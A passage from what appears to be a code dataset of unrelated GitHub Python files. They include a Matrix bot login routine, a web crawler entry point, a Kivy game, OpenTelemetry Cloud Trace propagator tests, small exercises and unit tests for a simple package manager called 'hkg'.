os.mkdir(store_path)\n\n client = AsyncClient(\n homeserver=home_server,\n user=bot_name,\n store_path=store_path,\n config=bot_config,\n )\n\n resp = await client.login(password=bot_pass, device_name=device_name)\n\n if isinstance(resp, LoginResponse):\n await write_details_to_disk(resp, home_server)\n message = \"Logged in via password.\"\n else:\n logger.error(f'homeserver = \"{home_server}\"; user = \"{bot_name}\"')\n logger.error(f\"Failed to log in: {resp}\")\n logger.error(f\"Trying to register...\")\n\n resp = await client.register(username=bot_name, password=bot_pass, device_name=device_name)\n message = \"Registered using specified credentials.\"\n\n if not isinstance(resp, LoginResponse):\n logger.critical(f'homeserver = \"{home_server}\"; user = \"{bot_name}\"')\n logger.critical(f\"Failed to register: {resp}\")\n quit(1)\n\n logger.info(message)\n\n else:\n with 
open(config_file, \"r\") as f:\n config = json.load(f)\n client = AsyncClient(\n config[\"home_server\"],\n config[\"user_id\"],\n device_id=config[\"device_id\"],\n store_path=store_path,\n config=bot_config,\n )\n\n client.restore_login(\n user_id=config[\"user_id\"],\n device_id=config[\"device_id\"],\n access_token=config[\"access_token\"],\n )\n logger.info(\"Logged in via access token\")\n\n return client\n\n\nasync def sync_forever(client: AsyncClient, timeout, full_state):\n while True:\n try:\n logger.info(\"Resyncing with matrix\")\n for room_id in client.rooms.keys():\n members = await client.joined_members(room_id=room_id)\n if len(members.members) < 2:\n await client.room_leave(room_id)\n await client.sync(timeout=timeout, full_state=full_state,)\n except (ClientConnectionError, ServerDisconnectedError):\n logger.warning(\"Unable to connect to homeserver, retrying in 15s...\")\n await sleep(15)\n finally:\n await client.close()\n","repo_name":"NLion74/Matrix-Notifier","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73810900649","text":"# -*- coding:utf-8 -*-\r\n################################################################################\r\n#\r\n# Copyright (c) 2015 Baidu.com, Inc. All Rights Reserved\r\n#\r\n################################################################################\r\n'''\r\nCreated on 2015年3月3日\r\n\r\n@author: wanhao01\r\n'''\r\n\r\nimport argparse\r\nimport os\r\nimport sys\r\n\r\nfrom crawler.minispider import logerror, SpiderConfigParser\r\nfrom crawler.minispider import loginfo\r\nfrom crawler.minispider.SpiderConfigParser import NoConfigError\r\nfrom crawler.minispider.SpiderConfigParser import SpiderConfig\r\nfrom crawler.minispider.SpiderHandler import Spiderhandler\r\n\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\nparser = argparse.ArgumentParser(prog='mini_spider.py',\r\n description = 'mini_spider.py,using the BFS,to save the ' + \r\n 'web page matching the specific pattern to local',\r\n epilog='bug reports:\\n mail: wanhao01@baidu.com',\r\n formatter_class=argparse.RawTextHelpFormatter)\r\n\r\nparser.add_argument('-v',\r\n '--version',\r\n action='store_true',\r\n dest='version',\r\n default=False,\r\n help='show version')\r\n\r\nparser.add_argument('-c',\r\n '--config',\r\n dest='config',\r\n default=False,\r\n help=\"specify the config file\")\r\n\r\noptions, _ = parser.parse_known_args()\r\nargs = parser.parse_args()\r\n\r\ndef initConfig():\r\n '''\r\n initialize the configuration file.\r\n '''\r\n configName = \"spider.conf\"\r\n if args.config:\r\n configName = args.config\r\n loginfo(configName) \r\n spiderConfig = SpiderConfig(configName)\r\n try:\r\n spiderConfig.loadConfigFile()\r\n except NoConfigError as error:\r\n logerror(str(error))\r\n logerror(str(type(error)) + ',' + error.message + \r\n ', the program will be exit, please check the config file.')\r\n return \r\n return spiderConfig\r\n\r\n\r\ndef crawl():\r\n '''\r\n encapsulate the logic.\r\n crawling using the specific configuration.\r\n '''\r\n config = initConfig()\r\n max_depth = config.getMaxDepth()\r\n handler = Spiderhandler()\r\n \r\n folder = config.getUrlListFile()\r\n for root, dirs, files in os.walk(folder):\r\n for f in files:\r\n print(root + os.sep + f)\r\n file_read = open(root + os.sep + f, 'r')\r\n urls = file_read.readlines()\r\n \r\n handler.crawl_urls(urls, config, config.getMaxDepth())\r\n 
\r\n\r\n\r\ndef main():\r\n '''\r\n the main function.\r\n '''\r\n crawl()\r\n print('finished')\r\n","repo_name":"onehao/opensource","sub_path":"pyml/crawler/minispider/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71043283047","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, StringProperty\nfrom kivy.vector import Vector\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color\nfrom kivy.animation import Animation\nfrom kivy.uix.button import Button\n\nfrom random import randint\n\nclass Character(Widget):\n\tdieCount = NumericProperty(None)\n\thealth = NumericProperty(None)\n\n\tdef create(self, createHealth):\n\t\tself.health = createHealth\n\t\n\tdef take_damage(self, damage):\n\t\tself.health -= damage\n\nclass HealthDisplay(Widget):\n\tcurHealth = NumericProperty(100)\n\tmaxHealth = NumericProperty(100)\n\n\tdef animate(self, instance):\n\t\t#self.curHealth += 10\n\t\t#anim = Animation(self.size(self.curHealth,50))\n\t\tanim = Animation(size(self.curHealth,50))\n\t\tanim.start(instance)\n\n\nclass CombatGame(Widget):\n\t#2 players\n\tplayer1 = ObjectProperty(None)\n\tplayer2 = ObjectProperty(None)\n\tplayer1HealthBar = ObjectProperty(None)\n\tplayer2HealthBar = ObjectProperty(None)\n\t\n\tdef initialize(self):\n\t\tself.player1.health=200\n\t\tself.player2.health=200\n\t\tbutton = Button(size_hint=(None, None), text='plop', on_press=self.update())\n\t\treturn button\n\t\t\n\t#def update(self, dt):\n\tdef update(self):\n\t\tself.player1HealthBar.animate\n\t\tself.player2HealthBar.animate\n\t\tself.player1.take_damage(10)\n\t\tself.player2.take_damage(3)\n\t\tself.player1HealthBar.curHealth=self.player1.health\n\t\tself.player2HealthBar.curHealth=self.player2.health\n\n\nclass CombatApp(App):\n\tdef build(self):\n\t\tgame = CombatGame()\n\t\tgame.initialize()\n\t\t#Clock.schedule_interval(game.update, 1.0/60.0)\n\t\treturn game\n\nif __name__ == '__main__':\n\tCombatApp().run()","repo_name":"Beweeted/CombatSimulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27925039274","text":"import unittest\n\nimport opentelemetry.trace as trace\nfrom opentelemetry.context import get_current\nfrom opentelemetry.context.context import Context\nfrom opentelemetry.propagators.cloud_trace_propagator import (\n _TRACE_CONTEXT_HEADER_NAME,\n CloudTraceFormatPropagator,\n)\nfrom opentelemetry.propagators.textmap import default_getter\nfrom opentelemetry.trace.span import (\n INVALID_SPAN_ID,\n INVALID_TRACE_ID,\n SpanContext,\n TraceFlags,\n format_trace_id,\n)\n\n\nclass TestCloudTraceFormatPropagator(unittest.TestCase):\n def setUp(self):\n self.propagator = CloudTraceFormatPropagator()\n self.valid_trace_id = 281017822499060589596062859815111849546\n self.valid_span_id = 17725314949316355921\n self.too_long_id = 111111111111111111111111111111111111111111111\n\n def _extract(self, header_value):\n \"\"\"Test helper\"\"\"\n header = {_TRACE_CONTEXT_HEADER_NAME: [header_value]}\n new_context = self.propagator.extract(\n carrier=header, getter=default_getter\n )\n return new_context\n\n def _extract_span_context(self, header_value):\n \"\"\"Test helper\"\"\"\n return trace.get_current_span(\n 
self._extract(header_value)\n ).get_span_context()\n\n def _inject(self, span=None):\n \"\"\"Test helper\"\"\"\n ctx = get_current()\n if span is not None:\n ctx = trace.set_span_in_context(span, ctx)\n output = {}\n self.propagator.inject(output, context=ctx)\n return output.get(_TRACE_CONTEXT_HEADER_NAME)\n\n def _assert_failed_to_extract(self, new_context: Context):\n self.assertEqual(new_context, Context())\n self.assertEqual(\n trace.get_current_span(new_context).get_span_context(),\n trace.INVALID_SPAN.get_span_context(),\n )\n\n def test_no_context_header(self):\n headers = {}\n new_context = self.propagator.extract(\n carrier=headers, getter=default_getter\n )\n self._assert_failed_to_extract(new_context)\n\n def test_empty_context_header(self):\n header = \"\"\n new_context = self._extract(header)\n self._assert_failed_to_extract(new_context)\n\n def test_valid_header(self):\n header = \"{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(1))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=10\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(10))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=0\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=0\".format(format_trace_id(self.valid_trace_id), 345)\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, 345)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{}\".format(format_trace_id(self.valid_trace_id), 345)\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, 345)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n def test_mixed_case_header_key(self):\n header_value = \"{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n\n for header_key in (\n \"X-Cloud-Trace-Context\",\n \"X-ClOuD-tRace-ConTeXt\",\n \"X-CLOUD-TRACE-CONTEXT\",\n ):\n header_map = {header_key: [header_value]}\n new_context = self.propagator.extract(\n carrier=header_map, getter=default_getter\n )\n new_span_context = trace.get_current_span(\n new_context\n ).get_span_context()\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(1))\n self.assertTrue(new_span_context.is_remote)\n\n def 
test_invalid_header_format(self):\n header = \"invalid_header\"\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o=\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"extra_chars/{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{}extra_chars;o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o=1extra_chars\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/;o=1\".format(format_trace_id(self.valid_trace_id))\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"/{};o=1\".format(self.valid_span_id)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\"123\", \"34\", \"4\")\n self._assert_failed_to_extract(self._extract(header))\n\n def test_invalid_trace_id(self):\n header = \"{}/{};o={}\".format(INVALID_TRACE_ID, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\"0\" * 32, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"0/{};o={}\".format(self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"234/{};o={}\".format(self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(self.too_long_id, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n def test_invalid_span_id(self):\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), INVALID_SPAN_ID, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), \"0\" * 16, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), \"0\", 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), self.too_long_id, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n def test_inject_with_no_context(self):\n output = self._inject()\n self.assertIsNone(output)\n\n def test_inject_with_invalid_context(self):\n output = self._inject(trace.INVALID_SPAN)\n self.assertIsNone(output)\n\n def test_inject_with_valid_context(self):\n span_context = SpanContext(\n trace_id=self.valid_trace_id,\n span_id=self.valid_span_id,\n is_remote=True,\n trace_flags=TraceFlags(1),\n )\n output = self._inject(trace.NonRecordingSpan(span_context))\n self.assertEqual(\n output,\n \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id),\n self.valid_span_id,\n 1,\n ),\n )\n","repo_name":"GoogleCloudPlatform/opentelemetry-operations-python","sub_path":"opentelemetry-propagator-gcp/tests/test_cloud_trace_propagator.py","file_name":"test_cloud_trace_propagator.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"13138614950","text":"# Escriba un programa para imprimir el Triángulo de Floyd.\n# 1\n# 01\n# 101\n# 0101\n# 10101\n\nn=int(input(\"Ingrese un número \"))\nfor i in range(1,n+1):\n fila = \"\"\n for 
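The propagator tests above exercise the `X-Cloud-Trace-Context` wire format `TRACE_ID/SPAN_ID;o=FLAGS`. A hypothetical parser for the flagged variant of that format is sketched below; the regex is my own illustration, not the library's internal validation (which, as the tests show, also accepts headers without the `;o=` suffix):

```python
import re

# Hypothetical parser for "TRACE_ID/SPAN_ID;o=FLAGS": 32 lowercase hex
# digits, a decimal span id, and decimal flags.
HEADER_RE = re.compile(r'^([0-9a-f]{32})/(\d{1,20});o=(\d+)$')

def parse_cloud_trace(value):
    m = HEADER_RE.match(value)
    if m is None:
        return None
    trace_id, span_id, flags = m.groups()
    return int(trace_id, 16), int(span_id), int(flags)

print(parse_cloud_trace(
    'd3f9c0f1a2b34c5d6e7f8091a2b3c4d5/17725314949316355921;o=1'))
```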
j in range(1,i+1):\n if(i+j) % 2 == 0:\n fila += \"1\"\n else:\n fila += \"0\"\n print(fila)\n","repo_name":"marcoaugusto14/Loops","sub_path":"4_triang_floyd.py","file_name":"4_triang_floyd.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24866407050","text":"#-*- encoding: utf-8 -*-\n\n####### usage:\n####### cat xml | python validate.py\n\nfrom lxml import etree\nimport sys\n\ndtd = etree.DTD(open('experimental/lmpd.dtd'))\n\nroot = etree.XML(sys.stdin.read())\n\nv = dtd.validate(root)\n\nprint('Validate: %s' % v)\n\nif not v :\n print(dtd.error_log.filter_from_errors()[0])\n","repo_name":"HWP-ai/DTD","sub_path":"lmp/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39529758517","text":"#test_resampling.py\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npd.options.display.float_format = '{:,.3f}'.format\r\ndr = pd.date_range('2020-03-01', periods=31, freq='D')\r\ndf = pd.DataFrame(np.sqrt(np.arange(len(dr))), index=dr,\r\n columns=['A'])\r\ndf_ = df\r\ndf_['index'] = df.index\r\ndf1 = df.resample('W-FRI').mean()\r\ndf_['resample:W-FRI_mean'] = df1\r\ndf4 = df1.resample('D').bfill() # upsampled daily\r\ndf_['upsample:bfill'] = df4\r\ndf5 = df1.resample('D').interpolate(method='linear')\r\ndf_['interp:linear'] = df5\r\ndf6 = df1.resample('D').interpolate(method='polynomial', order=2)\r\ndf_['interp:poly'] = df6\r\nprint(\"\\n df_ =\\n\", df_) \r\nfig, axes = plt.subplots(1,3, tight_layout=True)\r\ndf_[['A','upsample:bfill']].plot(ax=axes[0], fontsize=5) #그림10.4a\r\ndf_.plot.scatter(x='index', y='resample:W-FRI_mean', ax=axes[0])\r\ndf_[['A','interp:linear']].plot(ax=axes[1], fontsize=5) #그림10.4b\r\ndf_.plot.scatter(x='index', y='resample:W-FRI_mean', ax=axes[1])\r\ndf_[['A','interp:poly']].plot(ax=axes[2], fontsize=5) #그림10.4c\r\n# nan을 포함한 df1을 scatter 아닌 plot()을 사용해서도 점형으로 그릴 수 있다.\r\ndf_.plot(x='index', y='resample:W-FRI_mean', kind='scatter', ax=axes[2])\r\nplt.show()\r\n","repo_name":"rangyi22/bwktim","sub_path":"python_for_student/test_resampling.py","file_name":"test_resampling.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38830632829","text":"#!/usr/bin/env python3\n\nimport unittest\nimport os\nimport random\nimport string\n\nfrom hkg_development import hkg\n\n\nclass TestInitAndSetup(unittest.TestCase):\n\n def test_check_if_config_exists(self):\n test_config_path = '/tmp/.config/hkg/settings.conf'\n # Make sure there aren't any config files from previous testing\n if os.path.isfile(test_config_path):\n os.remove(test_config_path)\n # Test to see if correctly return False if file does not exist\n self.assertFalse(hkg.check_config_exists('/tmp'))\n # Make sure the test config directory exists\n os.makedirs(os.path.dirname(test_config_path), exist_ok=True)\n # Create an empty file at expected config path\n open(test_config_path, 'a').close()\n # Test to see if correctly return True if file exists\n self.assertTrue(hkg.check_config_exists('/tmp'))\n os.remove(test_config_path)\n\n def test_can_create_a_default_config(self):\n self.assertTrue(hkg.create_default_config('/tmp'))\n os.remove('/tmp/.config/hkg/settings.conf')\n\n def test_can_load_config_settings(self):\n 
hkg.create_default_config('/tmp/')\n hkg_config_data = hkg.load_config('/tmp')\n self.assertIn('SOURCES', hkg_config_data)\n self.assertIn('OPTIONS', hkg_config_data)\n os.remove('/tmp/.config/hkg/settings.conf')\n\n def test_add_and_remove_remotes(self):\n\n # Setup\n os.makedirs('/tmp/testhome/.config/hkg', exist_ok=True)\n\n # Test\n self.assertTrue(hkg.create_default_config('/tmp/testhome'))\n self.assertTrue(hkg.check_config_exists('/tmp/testhome'))\n self.assertTrue(hkg.add_repo('/tmp/testhome', 'http://127.0.0.1/tmp/hkg'))\n self.assertTrue(hkg.del_repo('/tmp/testhome', 'http://127.0.0.1/tmp/hkg'))\n self.assertFalse(hkg.del_repo('/tmp/testhome', 'https://sffennel.desktop.amazon.com/packages'))\n\n # Cleanup\n os.remove('/tmp/testhome/.config/hkg/settings.conf')\n os.rmdir('/tmp/testhome/.config/hkg')\n os.rmdir('/tmp/testhome/.config')\n os.rmdir('/tmp/testhome')\n\n def test_list_configured_repos(self):\n\n self.assertTrue(hkg.list_repo('~'))\n\n def test_scan_repo_for_new_packages(self):\n\n # Setup\n os.makedirs('/tmp/testrepo', exist_ok=True)\n hkg.create_repo('/tmp/testrepo')\n\n # Test\n self.assertTrue(hkg.update_repo('/tmp/testrepo'))\n\n # Cleanup\n os.remove('/tmp/testrepo/packages.hdb')\n os.rmdir('/tmp/testrepo')\n\n def test_print_readme(self):\n\n # Setup\n os.makedirs('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib', exist_ok=True)\n tempwrite = open('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/readme.md', 'w')\n tempwrite.write('This is a readme file.')\n tempwrite.close()\n tempwrite = open('/tmp/readmetest/.local/share/hkg/packages.hdb', 'w')\n tempwrite.write('[INSTALLED]\\nhkg = 0.1\\n[AVAILABLE]\\n\\n')\n tempwrite.close()\n\n # Test\n self.assertTrue(hkg.print_readme('/tmp/readmetest'))\n\n # Cleanup\n os.remove('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/readme.md')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/hkg/')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/')\n os.remove('/tmp/readmetest/.local/share/hkg/packages.hdb')\n os.rmdir('/tmp/readmetest/.local/share/hkg/')\n os.rmdir('/tmp/readmetest/.local/share/')\n os.rmdir('/tmp/readmetest/.local/')\n os.rmdir('/tmp/readmetest/')\n\n\nclass TestPackaging(unittest.TestCase):\n\n def test_validate_directory_structure(self):\n # Setup the test directory structure\n os.makedirs('/tmp/testsrc/testsrc/lib', exist_ok=True)\n os.makedirs('/tmp/testsrc/testsrc/etc', exist_ok=True)\n open('/tmp/testsrc/metadata', 'a').close()\n open('/tmp/testsrc/testsrc/program.bin', 'a').close()\n \n # Check simplest possible package is OK\n self.assertTrue(hkg.validate_source_directory('/tmp/testsrc'))\n\n # Should fail since only metadata file should exist in base dir\n open('/tmp/testsrc/bad.file', 'a').close()\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/bad.file')\n\n # Should fail since only one executable file should exist in source dir\n open('/tmp/testsrc/testsrc/bad.file', 'a').close()\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/testsrc/bad.file')\n\n # Should pass with files in main/src/lib and main/src/etc\n open('/tmp/testsrc/testsrc/lib/stuff.lib', 'a').close()\n open('/tmp/testsrc/testsrc/etc/settings.conf', 'a').close()\n self.assertTrue(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/testsrc/lib/stuff.lib')\n os.remove('/tmp/testsrc/testsrc/etc/settings.conf')\n\n # Should fail since only src dir w/ same name is allowed in 
main/\n os.makedirs('/tmp/testsrc/stuff', exist_ok=True)\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.rmdir('/tmp/testsrc/stuff')\n\n # Should fail since only bin and etc are valid dirs in main/src/\n os.makedirs('/tmp/testsrc/testsrc/stuff', exist_ok=True)\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.rmdir('/tmp/testsrc/testsrc/stuff')\n\n # Clean up\n os.remove('/tmp/testsrc/metadata')\n os.remove('/tmp/testsrc/testsrc/program.bin')\n os.rmdir('/tmp/testsrc/testsrc/lib')\n os.rmdir('/tmp/testsrc/testsrc/etc')\n os.rmdir('/tmp/testsrc/testsrc')\n os.rmdir('/tmp/testsrc')\n\n def test_init_new_package_directory(self):\n\n # Make sure the function returns True and that each piece of the skeleton is actually created\n self.assertTrue(hkg.init_package_directory('/tmp/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package/etc'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package/lib'))\n self.assertTrue(os.path.isfile('/tmp/test_package/metadata'))\n self.assertTrue(os.path.isfile('/tmp/test_package/test_package/your_program.bin'))\n\n # Cleanup\n os.remove('/tmp/test_package/test_package/your_program.bin')\n os.remove('/tmp/test_package/metadata')\n os.rmdir('/tmp/test_package/test_package/etc')\n os.rmdir('/tmp/test_package/test_package/lib')\n os.rmdir('/tmp/test_package/test_package')\n os.rmdir('/tmp/test_package')\n\n def test_validate_metadata(self):\n \n # Create the test metadata file. We'll manually edit the file's contents instead of using configparser.\n testfile = open('/tmp/metadata', 'w')\n testfile.write('[METADATA]\\n')\n testfile.write('name = spam\\n')\n testfile.write('version = 2.1\\n')\n testfile.write('description = An example package\\n')\n testfile.write('author_name = Eadrom\\n')\n testfile.write('author_email = eadrom@example.com\\n')\n testfile.write('website = http://example.com\\n')\n testfile.close()\n\n # Test\n self.assertTrue(hkg.validate_metadata('/tmp/metadata'))\n\n # Cleanup\n os.remove('/tmp/metadata')\n\n def test_zip_files_to_disk_as_package(self):\n # Create a fake package\n hkg.init_package_directory('/tmp/sources/ziptest')\n open('/tmp/sources/ziptest/ziptest/lib/functions.so', 'a').close()\n open('/tmp/sources/ziptest/ziptest/etc/settings.conf', 'a').close()\n\n # Write some text to the files to give them some content\n tempwrite = open('/tmp/sources/ziptest/ziptest/lib/functions.so', 'a')\n for i in range(25):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(65)) + '\\n')\n tempwrite.close()\n\n tempwrite = open('/tmp/sources/ziptest/ziptest/etc/settings.conf', 'a')\n for i in range(8):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(30)) + '\\n')\n tempwrite.close()\n\n tempwrite = open('/tmp/sources/ziptest/ziptest/your_program.bin', 'a')\n for i in range(200):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(79)) + '\\n')\n tempwrite.close()\n\n self.assertTrue(hkg.create_package('/tmp/sources/ziptest'))\n\n # Clean up\n os.remove('/tmp/sources/ziptest/ziptest/your_program.bin')\n os.remove('/tmp/sources/ziptest/metadata')\n os.remove('/tmp/sources/ziptest/ziptest/lib/functions.so')\n os.remove('/tmp/sources/ziptest/ziptest/etc/settings.conf')\n os.rmdir('/tmp/sources/ziptest/ziptest/etc')\n 
os.rmdir('/tmp/sources/ziptest/ziptest/lib')\n        os.rmdir('/tmp/sources/ziptest/ziptest')\n        os.rmdir('/tmp/sources/ziptest')\n        os.remove('/tmp/sources/ziptest.hkg')\n        os.rmdir('/tmp/sources')\n\n    def test_init_package_database(self):\n\n        # Test just providing a target directory.\n        self.assertTrue(hkg.init_package_database('/tmp/'))\n        self.assertTrue(os.path.isfile('/tmp/packages.hdb'))\n        os.remove('/tmp/packages.hdb')\n\n        # Test providing the entire path for the package database.\n        self.assertTrue(hkg.init_package_database('/tmp/packages.hdb'))\n        self.assertTrue(os.path.isfile('/tmp/packages.hdb'))\n        os.remove('/tmp/packages.hdb')\n\n        # Test providing a path that lacks the package database filename.\n        self.assertTrue(hkg.init_package_database('/tmp/testdb'))\n        self.assertTrue(os.path.isfile('/tmp/testdb/packages.hdb'))\n\n        # Make sure contents of skeleton database are correct.\n        tempread = open('/tmp/testdb/packages.hdb', 'r')\n        self.assertTrue(tempread.read() == '[INSTALLED]\\n\\n[AVAILABLE]\\n')\n        tempread.close()\n        os.remove('/tmp/testdb/packages.hdb')\n        os.rmdir('/tmp/testdb')\n\n    def test_validate_package_database(self):\n\n        # Setup\n        if os.path.isfile('/tmp/test.hdb'):\n            os.remove('/tmp/test.hdb')\n        tempwrite = open('/tmp/test.hdb', 'a')\n        tempwrite.write('[INSTALLED]\\n')\n        tempwrite.write('scripta = 1.1\\n')\n        tempwrite.write('\\n')\n        tempwrite.write('[AVAILABLE]\\n')\n        tempwrite.write('scripta = 1.1\\n')\n        tempwrite.write('dostuff = 2.4\\n')\n        tempwrite.close()\n\n        # Test\n        self.assertTrue(hkg.validate_package_database('/tmp/test.hdb'))\n\n        # Cleanup\n        os.remove('/tmp/test.hdb')\n\n    def test_update_package_database(self):\n\n        # Setup\n        if os.path.isfile('/tmp/test.hdb'):\n            os.remove('/tmp/test.hdb')\n        tempwrite = open('/tmp/test.hdb', 'a')\n        tempwrite.write('[INSTALLED]\\n')\n        tempwrite.write('scripta = 1.1\\n')\n        tempwrite.write('\\n')\n        tempwrite.write('[AVAILABLE]\\n')\n        tempwrite.write('scripta = 1.1\\n')\n        tempwrite.write('dostuff = 2.4\\n')\n        tempwrite.close()\n\n        # Test\n        self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'update', 'AVAILABLE', 'scripta', '1.2'))\n        self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'create', 'AVAILABLE', 'scriptz', '2.6'))\n        self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'delete', 'AVAILABLE', 'scripta', '0'))\n        self.assertFalse(hkg.package_database_api('/tmp/test.hdb', 'add', 'INSTALLED', 'stuffthing', '1.0'))\n        self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'check', 'INSTALLED', 'scripta', '0'))\n        self.assertFalse(hkg.package_database_api('/tmp/test.hdb', 'check', 'INSTALLED', 'blah', '0'))\n        self.assertEqual(hkg.package_database_api('/tmp/test.hdb', 'version', 'AVAILABLE', 'dostuff', '0'), '2.4')\n\n        # Cleanup\n        os.remove('/tmp/test.hdb')\n\n    def test_create_repository(self):\n\n        # Setup\n        os.makedirs('/tmp/testrepo', exist_ok=True)\n\n        # Test\n        self.assertTrue(hkg.create_repo('/tmp/testrepo'))\n        self.assertTrue(os.path.isfile('/tmp/testrepo/packages.hdb'))\n        self.assertTrue(hkg.validate_package_database('/tmp/testrepo/packages.hdb'))\n\n        # Cleanup\n        os.remove('/tmp/testrepo/packages.hdb')\n        os.rmdir('/tmp/testrepo')\n\n\nclass TestInstallPackage(unittest.TestCase):\n\n    # Might implement hash verification at some point\n    def test_validate_package_file(self):\n\n        pass\n\n    def test_prep_findpkg_download_extract_makesymlink(self):\n\n        # Test\n        self.assertTrue(hkg.install_package('hkghello', ''))\n        self.assertTrue(os.path.isfile(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/hkghello.sh')))\n        
